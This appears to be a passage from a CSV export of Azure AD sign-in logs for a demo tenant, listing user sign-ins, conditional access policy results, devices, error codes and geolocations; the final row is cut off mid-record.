+1268,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:36.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f5793659-7f30-46d5-93bc-4e324df21682,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",24b904d7-063a-4f4c-9637-40c772e51500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,24b904d7-063a-4f4c-9637-40c772e51500,SigninLogs,Sucess,41.90428925,-85.99833679
+1269,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:16.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50126,None,Invalid username or password or Invalid on-premise username or password.,0,832ae38e-2940-4bea-93f6-bb25f6131b3f,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,[],notApplied,08/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",b58c6208-3745-40bc-8745-ecaa883c1600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 50126, 'failureReason': 'Invalid username or password or Invalid on-premise username or password.'}",Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b58c6208-3745-40bc-8745-ecaa883c1600,SigninLogs,Failed,41.90428925,-85.99833679
+1270,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:25.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,18b6d84d-a85e-45cf-8526-55327801bb21,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",206c879d-2196-4a7a-8124-0022f7061500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,206c879d-2196-4a7a-8124-0022f7061500,SigninLogs,Sucess,41.90428925,-85.99833679
+1271,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:25.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,00ce469f-c08f-0000-5421-7048ac87a62d,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",cbc0f99c-7bef-40f5-9b26-c77d606d1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,cbc0f99c-7bef-40f5-9b26-c77d606d1500,SigninLogs,Sucess,41.90428925,-85.99833679
+1272,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:28.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ba210d4e-f482-4e04-8009-0aff7b87a9aa,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0eab89d1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,8d371308-4e1f-476f-97d6-c0eab89d1500,SigninLogs,Sucess,33.7984581,-84.38828278
+1273,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:44.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,19ecf017-2c61-45f5-90fa-b066c26b74cd,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0ea0ea01500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,8d371308-4e1f-476f-97d6-c0ea0ea01500,SigninLogs,Sucess,33.7984581,-84.38828278
+1274,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:10.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0bce469f-3063-0000-54b3-3f0e6bd895c6,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",23bcff85-732c-47fa-be9f-91d3c8401500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,23bcff85-732c-47fa-be9f-91d3c8401500,SigninLogs,Sucess,33.7984581,-84.38828278
+1275,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:58.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5dc974f5-aaf4-4ab0-ba41-19290a547afe,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4c926580-a7d1-4f3d-971f-7f0b820e1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4c926580-a7d1-4f3d-971f-7f0b820e1500,SigninLogs,Sucess,36.6404686,-78.26995087
+1276,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:47.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,fecc469f-a03c-0000-4780-af43648aaff5,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,[],notApplied,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c8ea9bc1-b11e-4423-93a8-17c0d1801400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,c8ea9bc1-b11e-4423-93a8-17c0d1801400,SigninLogs,Failed,41.90428925,-85.99833679
+1277,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:43.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f11228cf-ac22-48a9-90be-407bb8cdf2f8,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 